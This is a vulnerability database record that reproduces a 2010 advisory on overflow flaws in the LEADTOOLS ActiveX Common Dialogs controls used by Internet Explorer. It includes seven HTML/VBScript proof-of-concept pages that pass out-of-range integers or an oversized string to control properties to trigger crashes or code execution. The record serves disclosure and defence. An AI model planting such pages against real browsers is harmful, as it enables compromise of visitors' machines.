ID

VAR-201009-0424

TITLE

LEADCOXImgEfxDlgu.dll Control Remote Code Execution Vulnerability in LEADTOOLS Imaging Common Dialogs

DESCRIPTION

LEADTOOLS Imaging Common Dialogs provides professional-grade imaging common dialogs for graphics processing, transformations, and effects. The LtocxImgEfxDlgu. ActiveX control provided by Imaging Common Dialogs does not properly filter input parameters. Users who are tricked into accessing malicious web pages and transmitting long parameters may cause arbitrary code execution. An attacker may exploit these issues to execute arbitrary code within the context of the application (typically Internet Explorer) that invoked the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. Product Web Page: http://www.leadtools.com Affected version: 16.5.0.2 Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications. Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in different objects included in the Common Dialogs class. ActiveX Common Dialogs (File) -------------------> LtocxFileDlgu.dll - RegKey Safe for Script: True - RegKey Safe for Init: True Tested On: Microsoft Windows XP Professional SP3 (EN) Windows Internet Explorer 8.0.6001.18702 RFgen Mobile Development Studio 4.0.0.06 (Enterprise) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk 24.08.2010 Zero Science Lab Advisory ID: ZSL-2010-4961 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php ############################################################## Proof of Concept: ############################################################## 1. (Web, LtocxWebDlgu.dll / LTRDWU.DLL): ------------------------------------------------------ <object classid='clsid:00165B53-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxWebDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U" argCount = 1 arg1=-1 target.Bitmap = arg1 </script> 2. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL): ------------------------------------------------------ <object classid='clsid:00165B5B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxEfxDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U" argCount = 1 arg1=-1 target.Bitmap = arg1 </script> 3. (Image, LtocxImgDlgu.dll / LTRDMU.DLL): ------------------------------------------------------ <object classid='clsid:00165C7B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxImgDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U" argCount = 1 arg1=2147483647 target.Bitmap = arg1 </script> 4. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL): ------------------------------------------------------ <object classid='clsid:00165B57-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxImgEfxDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U" argCount = 1 arg1=-2147483647 target.Bitmap = arg1 </script> 5. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL): ------------------------------------------------------ <object classid='clsid:00165B69-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxImgDocDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U" argCount = 1 arg1=2147483647 target.Bitmap = arg1 </script> 6. (Color, LtocxClrDlgu.dll / LTRDRU.DLL): ------------------------------------------------------ <object classid='clsid:00165B4F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\LEAD Technologies\LEADTOOLS Active-X 16.5\Bin\CDLL\Win32\LtocxClrDlgu.dll" prototype = "Property Let UserPalette ( ByVal iIndex As Integer ) As Long" memberName = "UserPalette" progid = "LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U" argCount = 2 arg1=1 arg2=-2147483647 target.UserPalette(arg1 ) = arg2 </script> 7. (File, LtocxFileDlgu.dll / LTRDFU.DLL): ------------------------------------------------------ <object classid='clsid:00165C87-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxFileDlgu.dll" prototype = "Property Let DestinationPath As String" memberName = "DestinationPath" progid = "LTRASTERDLGFILELib_U.LEADRasterDlgFile_U" argCount = 1 arg1=String(9236, "A") target.DestinationPath = arg1 </script>

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

THREAT TYPE

network

TYPE

Boundary Condition Error

EXPLOIT AVAILABILITY

EXTERNAL IDS

REFERENCES

CREDITS

LiquidWorm

SOURCES

LAST UPDATE DATE

2022-10-19T22:39:18.968000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE